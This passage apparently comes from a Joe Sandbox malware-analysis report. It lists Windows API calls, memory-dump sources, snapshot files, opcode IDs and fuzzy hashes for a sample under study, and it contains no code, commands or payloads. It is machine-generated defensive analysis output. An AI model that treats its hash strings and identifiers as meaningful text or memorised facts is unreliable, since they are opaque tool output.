                                                                            • Part of subcall function 00F0E2E8: SetDlgItemTextW.USER32(?,00F3E274,?), ref: 00F0E38F
                                                                            • Part of subcall function 00F0E2E8: GetWindowRect.USER32(?,?), ref: 00F0E3C9
                                                                            • Part of subcall function 00F0E2E8: GetClientRect.USER32(?,?), ref: 00F0E3D5
                                                                          • GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                          • SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                          • String ID: 0
                                                                          • API String ID: 2622349952-4108050209
                                                                          • Opcode ID: c9140191ece761d8802e0fde5971201154ad4e17af153dfbe64a7c21ac9e7948
                                                                          • Instruction ID: da869a711bba8d324594ad0e885890a52d7db79da6bec5bc6d59db999f6ae752
                                                                          • Opcode Fuzzy Hash: c9140191ece761d8802e0fde5971201154ad4e17af153dfbe64a7c21ac9e7948
                                                                          • Instruction Fuzzy Hash: D1F04F7094438CAADF151F648C0DBEA3F59BF45365F048514FC84555E2CB7AC994FA50
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00F11206,?), ref: 00F10FEA
                                                                          • GetLastError.KERNEL32(?), ref: 00F10FF6
                                                                            • Part of subcall function 00F06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F06C54
                                                                          Strings
                                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00F10FFF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                          • API String ID: 1091760877-2248577382
                                                                          • Opcode ID: 99431bd22a9430f40dc62ff2d8abf0f86a76f2e9d1e747d8e1390d4969bf01d4
                                                                          • Instruction ID: 3054c968dbdf3d5170fb795b88dc8652e463a27dbe04febc04d1997f2046f058
                                                                          • Opcode Fuzzy Hash: 99431bd22a9430f40dc62ff2d8abf0f86a76f2e9d1e747d8e1390d4969bf01d4
                                                                          • Instruction Fuzzy Hash: 9AD02B7190453436D61033249D05C6E3C05DB11332F104704F138912E6CA1849D17692
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00F0DA55,?), ref: 00F0E2A3
                                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00F0DA55,?), ref: 00F0E2B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FindHandleModuleResource
                                                                          • String ID: RTL
                                                                          • API String ID: 3537982541-834975271
                                                                          • Opcode ID: 67741c8e250af4df1feb39339d0e7ed97aad30ee6416bac10ecf672c326b3f31
                                                                          • Instruction ID: 033f4390bc0fdb3b805028b430356c414522e496817541b4e162cf7f5bd5bf70
                                                                          • Opcode Fuzzy Hash: 67741c8e250af4df1feb39339d0e7ed97aad30ee6416bac10ecf672c326b3f31
                                                                          • Instruction Fuzzy Hash: CDC01271A40710A6EA34A7646D4DB837A595B00B3AF090848B281EE2D1DAA9C980A6A0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5[_H
                                                                          • API String ID: 0-3279724263
                                                                          • Opcode ID: b992f2cf213fc05a4d5af4f85c01f70981374f532bd8830ada3bd0b236cce4fa
                                                                          • Instruction ID: 9fe726cabfbc0c8c7754e034d104ae7db19e07461a80eee7c83611541d645665
                                                                          • Opcode Fuzzy Hash: b992f2cf213fc05a4d5af4f85c01f70981374f532bd8830ada3bd0b236cce4fa
                                                                          • Instruction Fuzzy Hash: 3B910172A19A8D4FE799DB6C88657ED7BE1FF99314F0001BED009CB2E6CBB418208750
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 441b66fb4bf18c9a4cf1c6181bf13ea46ce0bf3bcedff398bd02a655543574dc
                                                                          • Instruction ID: 301a14bc16fbeec825959e871770455465bdb3996b763157770a66e21c024e40
                                                                          • Opcode Fuzzy Hash: 441b66fb4bf18c9a4cf1c6181bf13ea46ce0bf3bcedff398bd02a655543574dc
                                                                          • Instruction Fuzzy Hash: 2F52D474A196598FDF6CCF58C4E96B877A9FF48300F1041BED45ECB296CA39A981CB40
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ecf35492d30a1c7931baaf4d46d8d0e2fca3450ca4bdcb92a923ab1fc887f553
                                                                          • Instruction ID: cdc02c679668099df59fee9c80a1a2187f763679618ce4e3a869c8f1c25ec1c3
                                                                          • Opcode Fuzzy Hash: ecf35492d30a1c7931baaf4d46d8d0e2fca3450ca4bdcb92a923ab1fc887f553
                                                                          • Instruction Fuzzy Hash: B851DE76A19A498BE7ACCB5C8869BFD7BE1EB99324F4002BED00DD67D5CAB414208740
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 412f6ba4e41dc0324848b9d7f7ae39511b1c6d25166af56428e7040e13964d3b
                                                                          • Instruction ID: 2aabd2660c4cdf7bd3df7e954ceba2893b7f47d9ebdd9caa53c17738dfa14a19
                                                                          • Opcode Fuzzy Hash: 412f6ba4e41dc0324848b9d7f7ae39511b1c6d25166af56428e7040e13964d3b
                                                                          • Instruction Fuzzy Hash: 2F71E570E1D54E8FEB69EBA4C8646BCBBB8FF46340F11057AD00ED71E5DA3A6A419700
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 24409876def899d3c8100011b8ffe99b331063794c96883e59e24086bb41e6fe
                                                                          • Instruction ID: c2c00932501de2a040c5aa8568cb3913752efc02e41ee5543215726a00dd54b9
                                                                          • Opcode Fuzzy Hash: 24409876def899d3c8100011b8ffe99b331063794c96883e59e24086bb41e6fe
                                                                          • Instruction Fuzzy Hash: C571D370E1E64E8EEB69DBA488606BCBBB9FF4A300F110579D00ED71E1DE396941C742
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4b106030c51f7419b05180d1745944436f989320d9b4dd75b4d5d9014ee3c11f
                                                                          • Instruction ID: 6f3d82cf90a61457ca65b1460ebe60e78ace9943fe094c00020c56b7167e25bc
                                                                          • Opcode Fuzzy Hash: 4b106030c51f7419b05180d1745944436f989320d9b4dd75b4d5d9014ee3c11f
                                                                          • Instruction Fuzzy Hash: D1517BB1B0E44D4FE778DA5888765B43BDCFF96310B0602B9D09EC35B2DD2EAA068351
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c3c5ef9a0d4c680a36da268798ea63f48e7d5bb76fcde9856706379a935e560b
                                                                          • Instruction ID: 46cb95f0f542b2caa6229d008d53ec1983159cae43e4c32c28fd1424662ab364
                                                                          • Opcode Fuzzy Hash: c3c5ef9a0d4c680a36da268798ea63f48e7d5bb76fcde9856706379a935e560b
                                                                          • Instruction Fuzzy Hash: B8715970A0EA4A8FE35ADB68C4A05B4BBA4FF05300F4545B9D04EC7AD7CB29B851C790
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1964c254878b05bdb45a0841c549ea7701bb0f8a05d5ae6dcce4533f402b2f14
                                                                          • Instruction ID: 82d230be4d4b5762397e4e22c3dae37f661b57af0d2ecdbe092dafd44d15c894
                                                                          • Opcode Fuzzy Hash: 1964c254878b05bdb45a0841c549ea7701bb0f8a05d5ae6dcce4533f402b2f14
                                                                          • Instruction Fuzzy Hash: 6C713A70A0EA4E8FE759DF54C0A05B4BBA8FF15310F8541B9D04AC7AD7CB29B851C791
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4ec2a8af5d258a68e76ccb190fac4d69d2a1decf3dfdf2da5e712781885327bb
                                                                          • Instruction ID: 988d6f96c8838c69de7bfe216f898966f3edff717bc028d5920fd72883e88436
                                                                          • Opcode Fuzzy Hash: 4ec2a8af5d258a68e76ccb190fac4d69d2a1decf3dfdf2da5e712781885327bb
                                                                          • Instruction Fuzzy Hash: A8512660E1E55E8BEFBC975888796F877A9FF55300F0042FAD04EC71D6DE296A808B41
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fcb8f92066e386f3f02ae2157aac48b11e4f466cd7f5f9d4b33cc015479ddb29
                                                                          • Instruction ID: 84d6f4baac5a5e3df3d7ea20ba28f1a11ef2e7044dc4305329e240470f4fe1f6
                                                                          • Opcode Fuzzy Hash: fcb8f92066e386f3f02ae2157aac48b11e4f466cd7f5f9d4b33cc015479ddb29
                                                                          • Instruction Fuzzy Hash: 28518DB0A0955D8FDBA9DB58C8A0BF9B7B4EF59300F1501BAD00ED32A1DA356A80CB41
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 28546e3177f105e633c09b2851bf6cf1d3c85b19d68884a2a34cf65e37a7cabb
                                                                          • Instruction ID: e5964567e3bb62d141693de632c424a259d42e71d4c74c886682f65e9bbda264
                                                                          • Opcode Fuzzy Hash: 28546e3177f105e633c09b2851bf6cf1d3c85b19d68884a2a34cf65e37a7cabb
                                                                          • Instruction Fuzzy Hash: C3412722B0C5290AE358F7BCA4A56FD7781DF9933AB0405BBE44ECB1D7DD18AD41C294
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da0fdef8b18f39470f40e3e56996931f703824c4e5080eb14eecf1586e36c983
                                                                          • Instruction ID: 9806039721892253ac0bdd16eefc626eb6ff8d5f28a5314753dadf424c71dc0e
                                                                          • Opcode Fuzzy Hash: da0fdef8b18f39470f40e3e56996931f703824c4e5080eb14eecf1586e36c983
                                                                          • Instruction Fuzzy Hash: 91415E3260D9488FDF98EF1CC4A5DB4B3E1FFA9320B0405AAD04EC7696DE25E855CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f2ba54b6978d53a818c001ce2d888c03dbd2609533d9c8281147bb224a703375
                                                                          • Instruction ID: 04566727207880ef84ee933e493b21c0dd001fa834685d87c27029b9d8b4cbe9
                                                                          • Opcode Fuzzy Hash: f2ba54b6978d53a818c001ce2d888c03dbd2609533d9c8281147bb224a703375
                                                                          • Instruction Fuzzy Hash: AD41743260DA098FDF98EF1CC4A5DB4B3E1FFA9320B14016AD04EC7292DE25E955CB41
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f42345dd147d745ed475c59d26d0a91ef7be8bbc7afa9a08f66327f7d5d96253
                                                                          • Instruction ID: 80d55fc531cff7932bd6880d19647e834ea59a94169a0a6c78f38229f2008973
                                                                          • Opcode Fuzzy Hash: f42345dd147d745ed475c59d26d0a91ef7be8bbc7afa9a08f66327f7d5d96253
                                                                          • Instruction Fuzzy Hash: DA316F3260D9488FDF98EF1CC4A5EA4B3E1FF6932070406A9D05EC7696DE25E845CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 89bd691bbb104f728a5ad24e8a411edbebfb42efebc1e21d3edd477e2848ceac
                                                                          • Instruction ID: 3cf075d1e303575c1854622c0b04b8c1eda28f9b603eb673d3c6cea01536a382
                                                                          • Opcode Fuzzy Hash: 89bd691bbb104f728a5ad24e8a411edbebfb42efebc1e21d3edd477e2848ceac
                                                                          • Instruction Fuzzy Hash: 3531923160CA488FDF9CEF1CC4A5D74B3E1FFA9314B1406AAD04AC72A2DE21E945CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 35afa0f6e0ace425c73501a62905219a0f28a80633cf9e89661ffa9d37543d8e
                                                                          • Instruction ID: 4dc592ff43903a78346a06c65a3d0c3eddb27d4e740c42f92a78a2af3f17974a
                                                                          • Opcode Fuzzy Hash: 35afa0f6e0ace425c73501a62905219a0f28a80633cf9e89661ffa9d37543d8e
                                                                          • Instruction Fuzzy Hash: DA414830A0951D8FE7B9DB58C8A4BB973A2EB58314F1101B9D40ED32A1CE75AE818B54
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 240c57e8fbaa7b6913cc2a229f342911d546e71a071624d6a7aedfc98b2cf865
                                                                          • Instruction ID: 230564af38da0e622586f55723ba4a09c1cbde4fb0e280e7ee2c5174f9208f29
                                                                          • Opcode Fuzzy Hash: 240c57e8fbaa7b6913cc2a229f342911d546e71a071624d6a7aedfc98b2cf865
                                                                          • Instruction Fuzzy Hash: E431607260D9498FDF98EF18C4A5EB4B3E1FF68320B0405A9D04EC7696DE25F885CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b529cc90a711288a89cb6f6316706ba9f76d0577b9d695d335401adea7cd4102
                                                                          • Instruction ID: 08887dfe6cc2f81b1f698223ec13c562abfba2ba8b6f92e8e4bbafdf52dd10dc
                                                                          • Opcode Fuzzy Hash: b529cc90a711288a89cb6f6316706ba9f76d0577b9d695d335401adea7cd4102
                                                                          • Instruction Fuzzy Hash: E331643160CA098FDF98EF18C4A5DB4B7E1FF69310B1506AED04AC72A2DE25F945CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 79964866621e199bf6272459339ac4476913992b57c6ef9259427e5d30307beb
                                                                          • Instruction ID: 9162dec432b49e478ad101d5f0a8196d37be69474b956b469ce1e8c43ce8333c
                                                                          • Opcode Fuzzy Hash: 79964866621e199bf6272459339ac4476913992b57c6ef9259427e5d30307beb
                                                                          • Instruction Fuzzy Hash: FF31CF71A0E68D8FDB56DBA488604AC7FB4FF16700B1501AAD08DDB1E3CA296D05C711
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 85b2b549839889bfdc18a6be75d54c30996fcaf2de63c5e893dc0ee1f9deafed
                                                                          • Instruction ID: ae076cf0b949cab528e2968ffe620325ed5ccb00976129c3941be54f713a71f2
                                                                          • Opcode Fuzzy Hash: 85b2b549839889bfdc18a6be75d54c30996fcaf2de63c5e893dc0ee1f9deafed
                                                                          • Instruction Fuzzy Hash: 2D31F471E0E65E8FDB55CB94C8A09EDBBF4FF49300F0500BAD00AD71A2CB29A905CB00
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 403359e364c3db4b2365c2bf9d08c1ecf366dbd01f950e5c75d0529876fea067
                                                                          • Instruction ID: 2cf4505a253f6f033f004ebbb3c5796938fe787eaad01cb7b5148020ee097322
                                                                          • Opcode Fuzzy Hash: 403359e364c3db4b2365c2bf9d08c1ecf366dbd01f950e5c75d0529876fea067
                                                                          • Instruction Fuzzy Hash: 49313EB0E2E50ECFEB68DB9484615BD77F8FF84700F52017AE00ED21A1DB3A6A408B41
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          • Instruction ID: 0648d11f8af2ea16b56f54e48f382946846ecdce0c923c7b5cac5245db5ddd9c
                                                                          • Opcode Fuzzy Hash: ef794187f50563e399e909806c4b33fb0ff9d2cb9148975eaf0903d32e18127e
                                                                          • Instruction Fuzzy Hash: 70116B31F0A50F8FF7199A48D4256F93398EF95361F05813AE81EC36E1CE2AA9408780
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab7958e1ee24759d6354b6229f6285ea05ad1a585c2785273d1bffcfb3383c98
                                                                          • Instruction ID: c7df5b32dfd3cd9895f4ed871b0457bb62bdd4ace28b1d5af3a58ac3274ed1b0
                                                                          • Opcode Fuzzy Hash: ab7958e1ee24759d6354b6229f6285ea05ad1a585c2785273d1bffcfb3383c98
                                                                          • Instruction Fuzzy Hash: CF01D631F0AA4C4FEB59E7E498625FCB7A0FF49350B15007AE04DD32D7DD2958428740
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 113482c38d92eec82706f904849562c8ec4ae6ff87c714f1d8bfda1409c37b65
                                                                          • Instruction ID: 7ed2f910b6c4b56358a41e53173dcb7988823033cf3d105401df543936f0d587
                                                                          • Opcode Fuzzy Hash: 113482c38d92eec82706f904849562c8ec4ae6ff87c714f1d8bfda1409c37b65
                                                                          • Instruction Fuzzy Hash: B901F536F0A64D8FEB31DFA8C4901DDBBA1EF41711F0145B7D0489B2A1D974678587A4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 28da93f4dfb3b29176ca0d0f765632fd724939cc67fc5d0b3af80653986834c8
                                                                          • Instruction ID: 43c50d4f1a38b96364863045917e35eef6d4341e3f8df1a5b19820d1492d7024
                                                                          • Opcode Fuzzy Hash: 28da93f4dfb3b29176ca0d0f765632fd724939cc67fc5d0b3af80653986834c8
                                                                          • Instruction Fuzzy Hash: 94012821A0EA5A4BE729A76048658FE7790AF85264780477EE0CACB5D2DE2CA5068390
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bdb30fdeb43fd74e94afd3daa83e4c8627485dfb83f85041ef8743289b9a140a
                                                                          • Instruction ID: 7df43b962372cb380146c4d4c3eb8efd7118ef3a7c9e2372519eec21aff4fd8d
                                                                          • Opcode Fuzzy Hash: bdb30fdeb43fd74e94afd3daa83e4c8627485dfb83f85041ef8743289b9a140a
                                                                          • Instruction Fuzzy Hash: 22014C21F0EA4A4FD729A76184219FEB790FF45318B40467EE08FCB4E7CE2CA6058390
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
